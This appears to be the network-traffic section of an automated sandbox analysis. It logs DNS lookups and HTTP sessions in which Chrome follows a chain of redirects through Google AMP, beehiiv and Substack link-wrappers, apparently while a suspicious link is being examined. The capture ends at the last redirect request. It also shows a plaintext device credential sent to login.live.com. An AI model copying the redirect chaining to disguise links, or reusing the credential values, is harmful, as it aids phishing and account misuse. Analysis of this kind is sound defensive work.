                                                                                                                                                                                                                                Oct 3, 2024 22:57:44.898293018 CEST1.1.1.1192.168.2.40x6141No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:57.220263004 CEST1.1.1.1192.168.2.40xb336No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:57.220805883 CEST1.1.1.1192.168.2.40x98deNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:00.724092007 CEST1.1.1.1192.168.2.40x379dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:07.450393915 CEST1.1.1.1192.168.2.40x1c0dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:07.450393915 CEST1.1.1.1192.168.2.40x1c0dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:08.820013046 CEST1.1.1.1192.168.2.40x1530No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:08.820472956 CEST1.1.1.1192.168.2.40xa099No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:08.820472956 CEST1.1.1.1192.168.2.40xa099No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                0192.168.2.44973940.126.31.69443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:56:54 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                Content-Length: 7642
                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                2024-10-03 20:56:54 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 70 68 72 6a 73 7a 6e 68 73 69 73 6d 74 6b 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 4e 65 75 79 46 4a 73 72 69 51 48 7a 76 53 72 49 23 2c 34 44 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 71 72 6c 66 67 75 6b 69 6a 65 76 6c 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02phrjsznhsismtk</Membername><Password>NeuyFJsriQHzvSrI#,4D</Password></Authentication><OldMembername>02akqrlfgukijevl</OldM
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                Expires: Thu, 03 Oct 2024 20:55:54 GMT
                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                x-ms-route-info: C528_BL2
                                                                                                                                                                                                                                x-ms-request-id: b5691f9c-e986-40e7-bdeb-965251f9541c
                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF00027B59 V: 0
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:04 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 17166
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 31 30 41 36 42 46 45 39 44 34 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 33 63 66 63 36 63 39 38 2d 65 65 34 31 2d 34 36 30 34 2d 39 66 63 30 2d 64 63 33 30 38 36 33 64 37 35 39 65 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>00188010A6BFE9D4</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="3cfc6c98-ee41-4604-9fc0-dc30863d759e" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.449742216.58.206.354432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC1406OUTGET /url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M HTTP/1.1
                                                                                                                                                                                                                                Host: www.google.se
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC1414INHTTP/1.1 302 Found
                                                                                                                                                                                                                                Location: https://www.google.se/amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M
                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-q3cOZ1xSFOcTkJCnvlqcVw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:56:55 GMT
                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                Content-Length: 657
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Set-Cookie: NID=518=rZdW_LPJWgPFU7TrHdarktOWffRKlTBgIXU8G9aZSk__iXq_xqCyhUd_zvBuFTv83crX0wamG3a1QB3GjY6yAfAirS1o4ps0NaGRrUOUDZDbnDPaBqtf2DuQ_GX1xGNm2CeQPmUPuVP1HOSMerFYaGG1QuuHGx6pT0CuF0D5yq5igjC6kcrCVl9u8QJp6RIT; expires=Fri, 04-Apr-2025 20:56:55 GMT; path=/; domain=.google.se; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC657INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 73 65 2f 61 6d 70 2f 73 2f 6c 69 6e 6b 2e 6d 61 69 6c 2e 62 65 65 68 69 69 76 2e 63 6f 6d 2f 73 73 2f 63 2f 75 30 30 31 2e 6d 74 53 41 7a 33 5f 57 67 5a 65 36 6f 51 64 69 4a 58 33 49 35 57 6b 79 31 37 53
                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.se/amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17S


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.449743216.58.206.354432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC1441OUTGET /amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M HTTP/1.1
                                                                                                                                                                                                                                Host: www.google.se
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: NID=518=rZdW_LPJWgPFU7TrHdarktOWffRKlTBgIXU8G9aZSk__iXq_xqCyhUd_zvBuFTv83crX0wamG3a1QB3GjY6yAfAirS1o4ps0NaGRrUOUDZDbnDPaBqtf2DuQ_GX1xGNm2CeQPmUPuVP1HOSMerFYaGG1QuuHGx6pT0CuF0D5yq5igjC6kcrCVl9u8QJp6RIT
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC1209INHTTP/1.1 302 Found
                                                                                                                                                                                                                                Location: https://link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M
                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0eg_B1D4Uh33iGQFDWDdhA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:56:55 GMT
                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                Content-Length: 637
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC181INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e
                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://link.
                                                                                                                                                                                                                                2024-10-03 20:56:55 UTC456INData Raw: 6d 61 69 6c 2e 62 65 65 68 69 69 76 2e 63 6f 6d 2f 73 73 2f 63 2f 75 30 30 31 2e 6d 74 53 41 7a 33 5f 57 67 5a 65 36 6f 51 64 69 4a 58 33 49 35 57 6b 79 31 37 53 68 6b 2d 6d 38 78 73 4d 6f 6c 74 55 4c 4d 53 33 6d 7a 75 42 6e 4c 2d 51 4d 39 70 56 54 55 54 78 79 57 63 31 57 79 4f 6f 76 6d 62 33 54 6b 33 4e 62 49 4c 32 64 32 45 41 69 4c 6e 41 4c 46 78 49 77 70 77 34 45 61 35 42 4a 6e 66 4e 6c 47 74 72 42 42 55 5f 30 39 4f 64 4f 79 78 57 49 6f 48 35 4f 47 6b 35 6b 72 6f 7a 5a 47 79 44 47 30 34 47 77 56 31 41 31 69 36 32 56 37 5a 48 41 73 48 44 32 48 75 58 78 4c 52 62 75 54 4c 77 4a 37 6e 6e 65 35 4f 6f 42 69 6b 72 57 62 50 30 39 77 64 6d 72 55 30 55 78 31 50 77 51 54 78 57 57 2d 34 57 71 4f 4c 71 44 4d 2d 65 4f 7a 6e 35 4f 53 35 64 63 39 41 43 2d 7a 73 5a 47
                                                                                                                                                                                                                                Data Ascii: mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZG


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.449746104.18.68.404432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:56:56 UTC1074OUTGET /ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M HTTP/1.1
                                                                                                                                                                                                                                Host: link.mail.beehiiv.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:56:56 UTC765INHTTP/1.1 302 Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:56:56 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://link.sbstck.com/redirect/6ef1e280-e65f-47a0-9173-11a97a4a3735?j=eyJ1IjoiNGI2N3k1In0.P8kfPr3fJr2h_Bk3DPLIxDv-gb9UenFUu61QzASc6Nw&utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Set-Cookie: __cf_bm=7V49yeGfwVLGKWMju.URBGSYUzkW_C_LevY7QfhCw78-1727989016-1.0.1.1-UV8e1WrEwmMmwHFKujcjrTU6takkuVgKkbqKjIaKWEq0cZN7rRwE13_UlXrNtzPhKKyWQEqa2iEQrqgmcsEplg; path=/; expires=Thu, 03-Oct-24 21:26:56 GMT; domain=.beehiiv.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7791a7242ea-EWR
                                                                                                                                                                                                                                2024-10-03 20:56:56 UTC270INData Raw: 31 30 37 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 73 62 73 74 63 6b 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 2f 36 65 66 31 65 32 38 30 2d 65 36 35 66 2d 34 37 61 30 2d 39 31 37 33 2d 31 31 61 39 37 61 34 61 33 37 33 35 3f 6a 3d 65 79 4a 31 49 6a 6f 69 4e 47 49 32 4e 33 6b 31 49 6e 30 2e 50 38 6b 66 50 72 33 66 4a 72 32 68 5f 42 6b 33 44 50 4c 49 78 44 76 2d 67 62 39 55 65 6e 46 55 75 36 31 51 7a 41 53 63 36 4e 77 26 61 6d 70 3b 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 69 6d 73 2d 6e 65 77 73 6c 65 74 74 65 72 2d 64 64 65 31 61 65 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 70 72 69 6e 74 2d 74 65 61 6d 22
                                                                                                                                                                                                                                Data Ascii: 107<a href="https://link.sbstck.com/redirect/6ef1e280-e65f-47a0-9173-11a97a4a3735?j=eyJ1IjoiNGI2N3k1In0.P8kfPr3fJr2h_Bk3DPLIxDv-gb9UenFUu61QzASc6Nw&amp;utm_source=lims-newsletter-dde1ae.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=sprint-team"
                                                                                                                                                                                                                                2024-10-03 20:56:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.449749188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:56:57 UTC862OUTGET /redirect/6ef1e280-e65f-47a0-9173-11a97a4a3735?j=eyJ1IjoiNGI2N3k1In0.P8kfPr3fJr2h_Bk3DPLIxDv-gb9UenFUu61QzASc6Nw&utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1
                                                                                                                                                                                                                                Host: link.sbstck.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
